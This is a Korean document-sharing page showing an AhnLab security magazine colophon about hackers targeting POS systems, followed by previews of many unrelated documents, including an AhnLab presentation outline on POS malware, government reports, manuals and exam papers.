34 Issue. 01 해커의 시선, POS 시스템으로 향한다 발행인 권치중 발행처 주식회사 안랩 편 집 안랩 콘텐츠기획팀 경기도 성남시 분당구 판교역로 220 T F AhnLab, Inc. All rights reserved. 본 간행물의 어떤 부분도 안랩의 서면 동의 없이 복제, 복사, 검색 시스 템으로 저장 또는 전송될 수 없습니다. 안랩, 안랩 로고는 안랩의 등록 상표입니다. 그 외 다른 제품 또는 회사 이름은 해당 소유자의 상표 또 는 등록상표일 수 있습니다. 본 문서에 수록된 정보는 고지없이 변경 될 수 있습니다.

35

AhnLab_template

AhnLab_template Plastic Thief POS System 노리는악성코드 ( 공개판 ) 2014.11.15 안랩시큐리티대응센터 (ASEC) 분석팀차민석책임연구원 Contents 01 02 03 04 05 06 07 POS (Point Of Sale) System 관련사고 POS System 보안위협 POS System 노리는악성코드 Case study 대응방법과한계맺음말및전망

More information

스마트폰 저렴하게 구매하는곳

스마트폰 저렴하게 구매하는곳 스마트폰 저렴하게 구매하는곳 폰광장 관리인 소개글 스마트폰 공동구매!!! 스마트폰, 핸드폰 저렴하게 구입하는 곳!!! 목차 1 아이폰5s 불량교체 난감 ~~~ 4 2 구글이 만든 또 하나의 운영체제!! 6 3 SKT 제휴 카드!!! 10 4 KT 제휴카드!!! 12 아이폰5s 불량교체 난감 ~~~ 2013.11.04 12:09 불량 아이폰5s, 교체해드리겠습니다.

More information

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항

More information

<목 차> I. 출장 개요 1 II. 주요일정 2 III. 세부내용 3 1. 전자공증체계 3 2. 전자공증 시스템 및 서비스 절차 4 3. 전자공증서비스 현황 6 4. 기타 7 IV. 국내 전자공증제도 도입 시 검토의견 9

<목 차> I. 출장 개요 1 II. 주요일정 2 III. 세부내용 3 1. 전자공증체계 3 2. 전자공증 시스템 및 서비스 절차 4 3. 전자공증서비스 현황 6 4. 기타 7 IV. 국내 전자공증제도 도입 시 검토의견 9 국외출장복명서 2007. 11. IT 기반보호단 안전한 IT 세상을 만드는 한국정보보호진흥원 I. 출장 개요 1 II. 주요일정 2 III. 세부내용 3 1. 전자공증체계 3 2. 전자공증 시스템 및 서비스 절차 4 3. 전자공증서비스 현황 6 4. 기타 7 IV. 국내 전자공증제도 도입 시 검토의견 9 일본의 전자공증제도 운영실태 시찰 I. 출장

More information

96부산연주문화\(김창욱\)

96부산연주문화\(김창욱\) 96 1 96 3 4 1 5 2 ( ),, TV,,,,, 96 5,,,, 3, ), ( :,1991) ), ), 13 1 3 96 23, 41, 4 68 (1) 11, 1223, (3/18 ) ( ) 6, 1 (4/2 ) 16, ( ), 1 (5/3 ), ( ) ( ) 1 (2) 96 8 33 41 (4/25 ), (9/24 ), ( ) 961 (5/27 )

More information

<33B1C7C3D6C1BEBABB28BCF6C1A42D31313135292E687770>

<33B1C7C3D6C1BEBABB28BCF6C1A42D31313135292E687770> 제 1 부 제1소위원회 (2) 충남지역(1) 부역혐의 민간인 희생 -당진군ㆍ홍성군ㆍ서산군(2)ㆍ예산군- 결정사안 1950. 9ㆍ28수복 후~1951. 1ㆍ4후퇴경 충청남도 당진 홍성 서산(2) 예산군에서 군 경에 의해 발생한 불법적인 민간인 희생으로 진실규명대상자 33명과 조사과정에서 인지된 자 151명이 희생된 사실을 또는 추정하여 진실규명으로 결정한 사례.

More information

160215

160215 [ 진경준, 대한민국 검사의 민낯! ] 진경준 검사 정봉주 : 진경준 검사장 사건이 충격적인가 봐요. 고위공직자 비리수사처 얘기도 나오는 걸 보니까. 왜 그래요, 느닷 없이? 김태규 : 공수처는 여러 검찰개혁안 중의 하나였죠. 검찰의 기 소독점주의를 견제하기 위해서는 공수처를 도입해야 한다 는 얘기가 오래 전부터 나왔고. 그런데 지금 정권이 레임 덕에 막 빠지려고

More information

歯20010629-001-1-조선일보.PDF

歯20010629-001-1-조선일보.PDF 6. 29 () 11:00 ( ) 20 0 1. 6. 29 11( ).(397-1941) 1. 2. 3. 4. 5. 1. 28, 60() (,, ) 30 619(, 6. 29) () 6 (,,,,, ),,, - 1 - < > (, ), () < > - 2 - 2.,,, 620,, - 3 - 3. ( ) 1,614,, 864 ( ) 1,6 14 864 () 734

More information

<3230313320B5BFBEC6BDC3BEC6BBE74542532E687770>

<3230313320B5BFBEC6BDC3BEC6BBE74542532E687770> 58 59 북로남왜 16세기 중반 동아시아 국제 질서를 흔든 계기는 북로남 왜였다. 북로는 북쪽 몽골의 타타르와 오이라트, 남왜는 남쪽의 왜구를 말한다. 나가시노 전투 1. 16세기 동아시아 정세(임진전쟁 전) (1) 명 1 북로남왜( 北 虜 南 倭 ) : 16세기 북방 몽골족(만리장성 구축)과 남쪽 왜구의 침입 2 장거정의 개혁 : 토지 장량(토지 조사)와

More information

??

?? 한국공항공사와 어린이재단이 함께하는 제2회 다문화가정 생활수기 공모전 수기집 대한민국 다문화가정의 행복과 사랑을 함께 만들어 갑니다. Contents 02 04 06 07 08 10 14 16 20 22 25 28 29 30 31 4 5 6 7 8 9 10 11 12 13 15 14 17 16 19 18 21 20 23 22 24 25 26 27 29 28

More information

이용자를 위하여 1. 본 보고서의 각종 지표는 강원도, 정부 각부처, 기타 국내 주요 기관에서 생산 한 통계를 이용하여 작성한 것으로서 각 통계표마다 그 출처를 주기하였음. 2. 일부 자료수치는 세목과 합계가 각각 반올림되었으므로 세목의 합이 합계와 일 치되지 않는 경우도 있음. 3. 통계표 및 도표의 내용 중에서 전년도판 수치와 일치되지 않는 것은 최근판에서

More information

yes시안1007_최종_2_30

yes시안1007_최종_2_30 CONTENTS 3 경영 비전 비전 국내 대표 문화전문 기업으로 2020년도 거래매출 1조 달성 핵심가치 고객 인재 투명성 이익 사회공헌 임원진 소개 CEO 김기호 김석환 (現)예스24 대표이사 COO (現)예스24 상무이사 (現)한세예스 24홀딩스 대표이사 ENT24 총괄이사 GS강남방송 대표이사 U 벤처캐피털 상담역 GS홈쇼핑 신사업부문장 조지워싱턴 정보지식시스템

More information

2004 IRISPen 사용자 설명서-본문-용지크기 조정-폰트포함.PDF

2004 IRISPen 사용자 설명서-본문-용지크기 조정-폰트포함.PDF wwwirispencokr wwwirispencokr IRISPen IRIS PCR(Pen Character Recognition) 1 IRISPen? IRISPen Express IRISPen Executive IRISPen Executive IRISPen Executive IRISPen Express,,,,, IRISP en, IRISPen ExecutiveIRISPen

More information

P2WW-2620-01HNZ0

P2WW-2620-01HNZ0 P2WW-2620-01HNZ0 ScanSnap Organizer 유저 가이드 시작하기 전에 ScanSnap Organizer 를 구입해 주셔서 감사합니다. 본 유저 가이드는는 개요 및 ScanSnap Organizer 의 화면과 기능에 대해 설명합니다. ScanSnap Organizer 를 사용하기 전에는 바른 사용을 위해서 이 가이드를 반드시 읽어 주십 시오.

More information

제주발전연구원 제주발전연구원 정책이슈브리프 2015년 11월 2일 Vol. 226 발행처 : 제주발전연구원 발행인 : 강기춘 주 소 : 63147 제주특별자치도 제주시 아연로 253 TEL. 064-726-0500 FAX. 064-751-2168 제주발전연구원은 지역사

제주발전연구원 제주발전연구원 정책이슈브리프 2015년 11월 2일 Vol. 226 발행처 : 제주발전연구원 발행인 : 강기춘 주 소 : 63147 제주특별자치도 제주시 아연로 253 TEL. 064-726-0500 FAX. 064-751-2168 제주발전연구원은 지역사 226 2015. 11. 2 사려니숲길 셔틀버스 시범운영 성과 및 향후과제 제주발전연구원 손 상 훈 책임연구원 제주발전연구원 제주발전연구원 정책이슈브리프 2015년 11월 2일 Vol. 226 발행처 : 제주발전연구원 발행인 : 강기춘 주 소 : 63147 제주특별자치도 제주시 아연로 253 TEL. 064-726-0500 FAX. 064-751-2168 제주발전연구원은

More information

02_3 지리산권 스마트폰 기반 3D 지도서비스_과업지시서.hwp

02_3 지리산권 스마트폰 기반 3D 지도서비스_과업지시서.hwp 과 업 지 시 서 사 업 명 지리산권 스마트폰 기반 3D 지도서비스 2011. 7 한 국 관 광 공 사 목 차 Ⅰ. 사업개요 3 Ⅱ. 3D 등산 전자지도 개발 5 Ⅲ. 스마트폰용 등산지도 서비스 개발 8 Ⅳ. 웹사이트용 지도 서비스 개발 12 I. 사업 개요 가. 사업명 : 지리산권 스마트폰 기반 3D 지도서비스 나. 사업기간 : 2011년 7월 ~ 2012년

More information

<C6EDC1FDBABB2DB5F0C0DAC0CEBAD0BEDF2E687770>

<C6EDC1FDBABB2DB5F0C0DAC0CEBAD0BEDF2E687770> 2009. 9 2009. 9 일러 두기 1. 본 책자는 심판관의 전문성을 제고하고 심판품질을 향상하기 위한 심판관 보수교육 교재로 편찬한 것으로써 먼저 권리별(상표, 디자인, 특허 실용 신안)로 대별하고, 특허 실용신안에 대하여는 기계 금속 건설, 화학 생명공학, 전기 전자 통신 분야로 구분하여 발간하였습니다. 2. 본 책자에 게재된 판결문은 2009년 4

More information

CLX8380_KR.book

CLX8380_KR.book 이 사용설명서와 제품은 저작권법에 의해 보호되어 있습니다. 삼성전자 ( 주 ) 의 사전 서면 동의 없이 사용설명서 및 제품의 일부 또는 전체를 복사, 복제, 번역 또는 전자매체나 기계가 읽을 수 있는 형태로 바꿀 수 없습니다. 이 사용설명서와 제품은 표기상의 잘못이나 기술적인 잘못이 있을 수 있으며 사전 통보 없이 이러한 내용들이 변경될 수 있습니다. CLX-8380ND,

More information

Microsoft Word - 青野論文_李_.doc

Microsoft Word - 青野論文_李_.doc 식민지 조선에 있어서 농촌진흥운동기의 경신숭조( 敬 神 崇 祖 ) -조선총독부의 신사정책과 관련하여- 아오노 마사아키( 青 野 正 明 ) 모모야마가쿠인대학( 桃 山 学 院 大 学 ) 번역:이화진 들어가는 말 본고에서는 주로 1930 년대 전반에 조선총독부에 의해 실시된 농촌진흥운동 1 에 있어서, 신사정책( 神 社 政 策 )과 관계가 있다고 예상되는 농본주의(

More information

안전을 위한 주의사항 제품을 올바르게 사용하여 위험이나 재산상의 피해를 미리 막기 위한 내용이므로 반드시 지켜 주시기 바랍니다. 2 경고 설치 관련 지시사항을 위반했을 때 심각한 상해가 발생하거나 사망에 이를 가능성이 있는 경우 설치하기 전에 반드시 본 기기의 전원을

안전을 위한 주의사항 제품을 올바르게 사용하여 위험이나 재산상의 피해를 미리 막기 위한 내용이므로 반드시 지켜 주시기 바랍니다. 2 경고 설치 관련 지시사항을 위반했을 때 심각한 상해가 발생하거나 사망에 이를 가능성이 있는 경우 설치하기 전에 반드시 본 기기의 전원을 Digital Video Recorder 간편설명서 XD3316 안전을 위한 주의사항 제품을 올바르게 사용하여 위험이나 재산상의 피해를 미리 막기 위한 내용이므로 반드시 지켜 주시기 바랍니다. 2 경고 설치 관련 지시사항을 위반했을 때 심각한 상해가 발생하거나 사망에 이를 가능성이 있는 경우 설치하기 전에 반드시 본 기기의 전원을 차단하고, 전원 플러그를 동시에

More information

2 국어 영역(A 형). 다음 대화에서 석기 에게 해 줄 말로 적절한 것은? 세워 역도 꿈나무들을 체계적으로 키우는 일을 할 예정 입니다. 주석 : 석기야, 너 오늘따라 기분이 좋아 보인다. 무슨 좋은 일 있니? 석기 : 응, 드디어 내일 어머니께서 스마트폰 사라고 돈

2 국어 영역(A 형). 다음 대화에서 석기 에게 해 줄 말로 적절한 것은? 세워 역도 꿈나무들을 체계적으로 키우는 일을 할 예정 입니다. 주석 : 석기야, 너 오늘따라 기분이 좋아 보인다. 무슨 좋은 일 있니? 석기 : 응, 드디어 내일 어머니께서 스마트폰 사라고 돈 20학년도 6월 고2 전국연합학력평가 문제지 제 교시 국어 영역 형 (A ) [ ~ 2] 다음은 교내 텔레비전 방송을 통해 진행된 학생의 발 표이다. 물음에 답하시오. 안녕하십니까? 입니다. 오랜 시간 학교에서 교복을 입 고 생활하자니 불편한 점이 한두 가지가 아닙니다. 그래서 교 복이 좀 더 편했으면 좋겠다는 생각을 자주 하게 됩니다. 현재 착용하고 있는

More information

슬라이드 1

슬라이드 1 사용 전에 사용자 주의 사항을 반드시 읽고 정확하게 지켜주시기 바랍니다. 사용설명서의 구성품 형상과 색상은 실제와 다를 수 있습니다. 사용설명서의 내용은 제품의 소프트웨어 버전이나 통신 사업자의 사정에 따라 다를 수 있습니다. 본 사용설명서는 저작권법에 의해 보호를 받고 있습니다. 본 사용설명서는 주식회사 블루버드소프트에서 제작한 것으로 편집 오류, 정보 누락

More information

06.....

06..... Special Issue VOL. 39 NO. 4 2006. 4 29 Special Issue 30 VOL. 39 NO. 4 2006. 4 31 Special Issue 32 VOL. 39 NO. 4 2006. 4 33 Special Issue 34 VOL. 39 NO. 4 2006. 4 35 Special Issue 36 VOL. 39 NO. 4 2006.

More information

며 오스본을 중심으로 한 작은 정부, 시장 개혁정책을 밀고 나갔다. 이에 대응 하여 노동당은 보수당과 극명히 반대되는 정강 정책을 내세웠다. 영국의 정치 상황은 새누리당과 더불어 민주당, 국민의당이 서로 경제 민주화 와 무차별적 복지공약을 앞세우며 표를 구걸하기 위한

며 오스본을 중심으로 한 작은 정부, 시장 개혁정책을 밀고 나갔다. 이에 대응 하여 노동당은 보수당과 극명히 반대되는 정강 정책을 내세웠다. 영국의 정치 상황은 새누리당과 더불어 민주당, 국민의당이 서로 경제 민주화 와 무차별적 복지공약을 앞세우며 표를 구걸하기 위한 4.13 총선, 캐머런과 오스본, 영국 보수당을 생각하다 정 영 동 중앙대 경제학과 자유경제원 인턴 우물 안 개구리인 한국 정치권의 4.13 총선이 한 달도 남지 않았다. 하지만 정당 간 정책 선거는 실종되고 오로지 표를 얻기 위한 이전투구식 경쟁이 심 화되고 있다. 정말 한심한 상황이다. 정당들은 각 당이 추구하는 이념과 정강 정책, 목표를 명확히 하고,

More information

Assign an IP Address and Access the Video Stream - Installation Guide

Assign an IP Address and Access the Video Stream - Installation Guide 설치 안내서 IP 주소 할당 및 비디오 스트림에 액세스 책임 본 문서는 최대한 주의를 기울여 작성되었습니다. 잘못되거나 누락된 정보가 있는 경우 엑시스 지사로 알려 주시기 바랍니다. Axis Communications AB는 기술적 또는 인쇄상의 오류에 대해 책 임을 지지 않으며 사전 통지 없이 제품 및 설명서를 변경할 수 있습니다. Axis Communications

More information

정보화 산업의 발전단계 : 정보혁명의 진화 정보화 산업의 발전단계 1세기에 두 번 정도의 큰 기술혁명이 이루어져 경제성장의 원동력으로 작용 uit 시대는 정보혁명 중 인터넷 이후의 새로운 기술혁명인 컨버전스 기술이 핵심이 되는 시대 uit 시대는 정보화의 극대화와 타

정보화 산업의 발전단계 : 정보혁명의 진화 정보화 산업의 발전단계 1세기에 두 번 정도의 큰 기술혁명이 이루어져 경제성장의 원동력으로 작용 uit 시대는 정보혁명 중 인터넷 이후의 새로운 기술혁명인 컨버전스 기술이 핵심이 되는 시대 uit 시대는 정보화의 극대화와 타 모바일 혁명이 바꾸는 기업의 미래 모바일 빅뱅의 시대 기업경영환경의 변화 2011. 04. 26 더존 IT 그룹 더존씨앤티 지용구 사장 더존씨앤티 (트위터ID : Jiyonggu / E-mail : todcode@duzon.com) 11 정보화 산업의 발전단계 : 정보혁명의 진화 정보화 산업의 발전단계 1세기에 두 번 정도의 큰 기술혁명이 이루어져 경제성장의

More information

공지사항

공지사항 상명사이버캠퍼스 군이러닝 강좌 학습안내 1. 사이버캠퍼스 접속방법 브라우저 주소창에서 직접 http://cyber.smu.ac.kr 입력하여 접속합니다. : 추천 2. 개설강좌 및 수업 안내 가. 개설과목 : 컴퓨터와정보사회(군인) 나. 수업시작 : 2015. 9.1(화) 10:00 이후부터 다. 평가방법 1) 중간, 기말고사는 off-line

More information

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E228313230C8A3292E687770>

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E228313230C8A3292E687770> 금융정보화 주요동향 제120호 2010. 1. 28 1. 금융업계 IT동향 2. IT 동향 3. IT 용어 정보시스템본부 종 합 2010. 1월 제120호 1. 2010년 IT 전망 2010년 전 세계 10대 IT 산업전망 2010년 국내 IT 시장 전망 2010년 IT 10대 전략 이슈 선정 2010년 12대 보안 이슈 예측 2010년 금융권 보안 정책방향

More information

<322D323720C8A3C1D6C1A6C6F3C1F62E687770>

<322D323720C8A3C1D6C1A6C6F3C1F62E687770> 참여정부 정책보고서 2-27 호 주 제 폐 지 - 호주제 벽을 넘어 평등세상으로! - 2008 작성중인 초안자료 안보전략비서관: 박 선 원 행정관: 김 호 홍 외교부 북핵외교기획단 북핵정책과 : 손 창 호 발 간 사 참여정부가 혁신과 통합을 표방하며 출범한 지 5년, 이제 그 성과와 한계에 대한 스스로의 평가를 국민들 앞에 내놓을 때가 되었습니다.

More information

COVER STORY

COVER STORY MONTHLY MAGAZINE VOL. 47 / 2015 NOVEMBER MEDIACREATE MONTHLY MAGAZINE VOL. 47 / 2015 NOVEMBER COVER STORY 02 COVER STORY 04 HOT ISSUE 1 06 HOT ISSUE 2 10 HOT ISSUE 3 CONTENTS 14 STYLE 14 04 46 74 Program

More information

User Guide

User Guide 하드웨어 참조 설명서 HP RP2 소매 시스템 Copyright 2014 Hewlett-Packard Development Company, L.P. Microsoft 와 Windows 는 Microsoft 그룹의 미 국 등록 상표입니다. 본 설명서의 내용은 사전 통지 없이 변경될 수 있습니다. HP 제품 및 서비스에 대한 유일한 보증은 제품 및 서비스와 함께

More information

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 모바일 클라우드 서비스 융합사례와 시장 전망 및 신 사업전략 2011. 10 AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 AGENDA 01. 모바일 산업의 환경 변화 가치 사슬의 분화/결합 모바일 업계에서도 PC 산업과 유사한 모듈화/분업화 진행 PC 산업 IBM à WinTel 시대 à

More information

06 ƯÁý

06 ƯÁý Special Issue 12 VOL. 40 NO. 9 2007. 9 13 Special Issue 14 한강 르네상스 마스터플랜에 대하여 단조로운 병풍식 아파트의 외관을 개선하면서 주변지 수립해 나갈 예정이다. 역과 어울리는 경관 건축물을 적극 유도하고, 시각회 랑 및

More information

우리나라의 전통문화에는 무엇이 있는지 알아봅시다. 우리나라의 전통문화를 체험합시다. 우리나라의 전통문화를 소중히 여기는 마음을 가집시다. 5. 우리 옷 한복의 특징 자료 3 참고 남자와 여자가 입는 한복의 종류 가 달랐다는 것을 알려 준다. 85쪽 문제 8, 9 자료

우리나라의 전통문화에는 무엇이 있는지 알아봅시다. 우리나라의 전통문화를 체험합시다. 우리나라의 전통문화를 소중히 여기는 마음을 가집시다. 5. 우리 옷 한복의 특징 자료 3 참고 남자와 여자가 입는 한복의 종류 가 달랐다는 것을 알려 준다. 85쪽 문제 8, 9 자료 통합 우리나라 ⑵ 조상님들이 살던 집에 대 해 아는 어린이 있나요? 저요. 온돌로 난방과 취사를 같이 했어요! 네, 맞아요. 그리고 조상님들은 기와집과 초가집에서 살았어요. 주무르거나 말아서 만들 수 있는 전통 그릇도 우리의 전통문화예요. 그리고 우리 옷인 한복은 참 아름 답죠? 여자는 저고리와 치마, 남자는 바지와 조끼를 입어요. 명절에 한복을 입고 절을

More information

상품 전단지

상품 전단지 2013 2013 추석맞이 추석맞이 지역우수상품 안내 안내 지역우수상품 지역 우수상품을 안내하여 드리오니 명절 및 행사용 선물로 많이 활용하여 주시기 바랍니다. 지역우수상품을 구입하시면 지역경제가 살아납니다. 즐거운 한가위 보내시고, 복 많이 받으세요! - 경기동부상공회의소 임직원 일동 - 지역우수상품을 구입하시면 지역경제가 살아납니다.

More information

::: 해당사항이 없을 경우 무 표시하시기 바랍니다. 검토항목 검 토 여 부 ( 표시) 시 민 : 유 ( ) 무 시 민 참 여 고 려 사 항 이 해 당 사 자 : 유 ( ) 무 전 문 가 : 유 ( ) 무 옴 브 즈 만 : 유 ( ) 무 법 령 규 정 : 교통 환경 재

::: 해당사항이 없을 경우 무 표시하시기 바랍니다. 검토항목 검 토 여 부 ( 표시) 시 민 : 유 ( ) 무 시 민 참 여 고 려 사 항 이 해 당 사 자 : 유 ( ) 무 전 문 가 : 유 ( ) 무 옴 브 즈 만 : 유 ( ) 무 법 령 규 정 : 교통 환경 재 시 민 문서번호 어르신복지과-1198 주무관 재가복지팀장 어르신복지과장 복지정책관 복지건강실장 결재일자 2013.1.18. 공개여부 방침번호 대시민공개 협 조 2013년 재가노인지원센터 운영 지원 계획 2013. 01. 복지건강실 (어르신복지과) ::: 해당사항이 없을 경우 무 표시하시기 바랍니다. 검토항목 검 토 여 부 ( 표시) 시 민 : 유 ( ) 무

More information

2

2 1 2 3 4 5 6 또한 같은 탈북자가 소유하고 있던 이라고 할수 있는 또 한장의 사진도 테루꼬양이라고 보고있다. 二宮喜一 (니노미야 요시가즈). 1938 년 1 월 15 일생. 신장 156~7 센치. 체중 52 키로. 몸은 여윈형이고 얼굴은 긴형. 1962 년 9 월경 도꾜도 시나가와구에서 실종. 당시 24 세. 직업 회사원. 밤에는 전문학교에

More information

화이련(華以戀) 141001.hwp

화이련(華以戀) 141001.hwp 年 花 下 理 芳 盟 段 流 無 限 情 惜 別 沈 頭 兒 膝 夜 深 雲 約 三 십년을 꽃 아래서 아름다운 맹세 지키니 한 가닥 풍류는 끝없는 정이어라. 그대의 무릎에 누워 애틋하게 이별하니 밤은 깊어 구름과 빗속에서 삼생을 기약하네. * 들어가는 글 파르라니 머리를 깎은 아이가 시린 손을 호호 불며 불 옆에 앉아 있다. 얼음장 같은 날씨에 허연 입김이 연기처럼

More information

ÆòÈ�´©¸® 94È£ ³»Áö_ÃÖÁ¾

ÆòÈ�´©¸® 94È£ ³»Áö_ÃÖÁ¾ 사람 안간힘을 다해 행복해지고 싶었던 사람, 허세욱을 그리다 - 허세욱 평전 작가 송기역 - 서울 평통사 노동분회원 허세욱. 효순이 미선이의 억울한 죽음에 대 해 미국은 사죄하라는 투쟁의 현장에 서 그 분을 처음 만났다. 평택 대추리 의 넓은 들판을 두 소녀의 목숨을 앗 아간 미군들에게 또 빼앗길 순 없다며 만들어 온 현수막을 대추초교에 같이 걸었다. 2007년

More information

歯1##01.PDF

歯1##01.PDF 1.? 1.?,..,.,. 19 1.,,..,. 20 1.?.,.,,...,.,..,. 21 1,.,.,. ( ),. 10 1? 2.5%. 1 40. 22 1.? 40 1 (40 2.5% 1 ). 10 40 4., 4..,... 1997 ( ) 12. 4.6% (26.6%), (19.8%), (11.8%) 23 1. (?).. < >..,..!!! 24 2.

More information

<5BC1F8C7E0C1DF2D31B1C75D2DBCF6C1A4BABB2E687770>

<5BC1F8C7E0C1DF2D31B1C75D2DBCF6C1A4BABB2E687770> 제3편 정 치 제3편 정치 제1장 의회 제1절 의회 기구 제2절 의회기구 및 직원 현황 자치행정전문위원회 자치행정전문위원 산업건설위원회 산업건설전문위원 제1장 의회 321 제3절 의회 현황 1. 제1대 고창군의회 제1대 고창군의회 의원 현황 직 위 성 명 생년월일 주 소 비 고 322 제3편 정치 2. 제2대 고창군의회 제2대 고창군의회 의원 현황 직 위

More information

120229(00)(1~3).indd

120229(00)(1~3).indd 법 률 국회에서 의결된 공직선거법 일부개정법률을 이에 공포한다. 대 통 령 이 명 박 2012년 2월 29일 국 무 총 리 김 황 식 국 무 위 원 행정안전부 맹 형 규 장 관 (중앙선거관리위원회 소관) 법률 제11374호 공직선거법 일부개정법률 공직선거법 일부를 다음과 같이 개정한다. 제21조제1항에 단서를 다음과 같이 신설한다. 다만,세종특별자치시의 지역구국회의원

More information

01Report_210-4.hwp

01Report_210-4.hwp 연구보고서 210-4 해방 후 한국여성의 정치참여 현황과 향후 과제 한국여성개발원 목 차 Ⅰ 서 론 Ⅱ 국회 및 지방의회에서의 여성참여 Ⅲ 정당조직내 여성참여 및 정당의 여성정책 Ⅳ 여성유권자의 투표율 및 투표행태 Ⅴ 여성단체의 여성정치참여 확대를 위한 운동 Ⅵ 여성의 정치참여 확대를 위한 향후 과제 참고문헌 부 록 표 목 차 Ⅰ 서 론 . 서론 1.

More information

<C3D1BCB15FC0CCC8C45FBFECB8AE5FB1B3C0B0C0C75FB9E6C7E228323031362D352D32315FC5E4292E687770>

<C3D1BCB15FC0CCC8C45FBFECB8AE5FB1B3C0B0C0C75FB9E6C7E228323031362D352D32315FC5E4292E687770> 총선 이후 우리 교육의 방향 당 체제에서 우리 교육의 전망과 교육행정가들의 역할 박 호 근 서울시의회 의원 교육위원회 위원 서론 년 월 일 제 대 국회의원 선거가 치러졌다 선거는 바로 민의 의 반영이기 때문에 총선결과를 살펴보고 왜 이러한 결과가 나왔는가를 분석해 본 후 년 월 일을 기점으로 제 대 국회의원들의 임기가 시 작되는 상황에서 우리 교육이 어떻게

More information

목 차 營 下 面 5 前 所 面 71 後 所 面 153 三 木 面 263 龍 流 面 285 都 已 上 條 367 同 治 六 年 (1867) 正 月 日 永 宗 防 營 今 丁 卯 式 帳 籍 범례 1. 훼손 등의 이유로 판독이 불가능한 글자는 로 표기함. 단, 비정 이 가능한 경우는 ( ) 안에 표기함. 2. 원본에서 누락된 글자는 [ ] 안에 표기함. 단, 누락된

More information

639..-1

639..-1 제639호 [주간] 2014년 12월 15일(월요일) http://gurotoday.com http://cafe.daum.net/gorotoday 문의 02-830-0905 대입 준비에 지친 수험생 여러분 힘내세요 신도림테크노마트서 수험생과 학부모 600명 대상 대입설명회 구로아트밸리서는 수험생 1,000명 초대 해피 콘서트 열려 구로구가 대입 준비로 지친

More information

교육 과 학기 술부 고 시 제 20 11-36 1호 초 중등교육법 제23조 제2항에 의거하여 초 중등학교 교육과정을 다음과 같이 고시합니다. 2011년 8월 9일 교육과학기술부장관 1. 초 중등학교 교육과정 총론은 별책 1 과 같습니다. 2. 초등학교 교육과정은 별책

교육 과 학기 술부 고 시 제 20 11-36 1호 초 중등교육법 제23조 제2항에 의거하여 초 중등학교 교육과정을 다음과 같이 고시합니다. 2011년 8월 9일 교육과학기술부장관 1. 초 중등학교 교육과정 총론은 별책 1 과 같습니다. 2. 초등학교 교육과정은 별책 교육과학기술부 고시 제 2011 361호 [별책 3] 중학교 교육과정 교육 과 학기 술부 고 시 제 20 11-36 1호 초 중등교육법 제23조 제2항에 의거하여 초 중등학교 교육과정을 다음과 같이 고시합니다. 2011년 8월 9일 교육과학기술부장관 1. 초 중등학교 교육과정 총론은 별책 1 과 같습니다. 2. 초등학교 교육과정은 별책 2 와 같습니다. 3.

More information

시험지 출제 양식

시험지 출제 양식 2013학년도 제2학기 제1차 세계사 지필평가 계 부장 교감 교장 2013년 8월 30일 2, 3교시 제 3학년 인문 (2, 3, 4, 5)반 출제교사 : 백종원 이 시험 문제의 저작권은 풍암고등학교에 있습니다. 저 작권법에 의해 보호받는 저작물이므로 전재와 복제는 금지 되며, 이를 어길 시 저작권법에 의거 처벌될 수 있습니다. 3. 전근대 시기 (가)~(라)

More information

177

177 176 177 178 179 180 181 182 183 184 185 186 187 188 (2) 양주조씨 사마방목에는 서천의 양주조씨가 1789년부터 1891년까지 5명이 합격하였다. 한산에서도 1777년부터 1864년까지 5명이 등재되었고, 비인에서도 1735년부터 1801년까지 4명이 올라있다. 서천지역 일대에 넓게 세거지를 마련하고 있었 던 것으로

More information

제주어 교육자료(중등)-작업.hwp

제주어 교육자료(중등)-작업.hwp 여는말 풀꽃, 제주어 제주어는 제주인의 향기입니다. 제주인의 삶의 손끝에서 피어나는 삶의 향기이고, 꿈의 내음입니다. 그분들이 어루만졌던 삶이 거칠었던 까닭에 더욱 향기롭고, 그 꿈이 애틋했기에 더욱 은은합니다. 제주어는 제주가 피워낸 풀잎입니다. 제주의 거친 땅에 뿌리를 내리고 싹을 틔우고, 비바람 맞고 자랐기에 더욱 질박합니다. 사철 싱그러운 들풀과 들꽃향기가

More information

¸é¸ñ¼Ò½ÄÁö 63È£_³»Áö ÃÖÁ¾

¸é¸ñ¼Ò½ÄÁö 63È£_³»Áö ÃÖÁ¾ 정보나눔 섭이와 함께하는 여행 임강섭 복지과 과장 여름이다. 휴가철이다. 다 들 어디론가 떠날 준비에 마음 이 들떠 있는 시기가 아닌가 싶다. 여행 매니아까지는 아니 지만, 나름 여행을 즐기는 사 람으로서 가족들과 신나는 휴 가를 보낼 계획에 살짝 들떠 있는 나에게 혼자만 신나지 말 고 같이 좀 신났으면 좋겠다며 가족들과 같이 가면 좋은 여행 눈이 시리도록

More information

<C3D6C1BE5FBBF5B1B9BEEEBBFDC8B0B0DCBFEFC8A32831333031323120C3D6C1BEBABB292E687770>

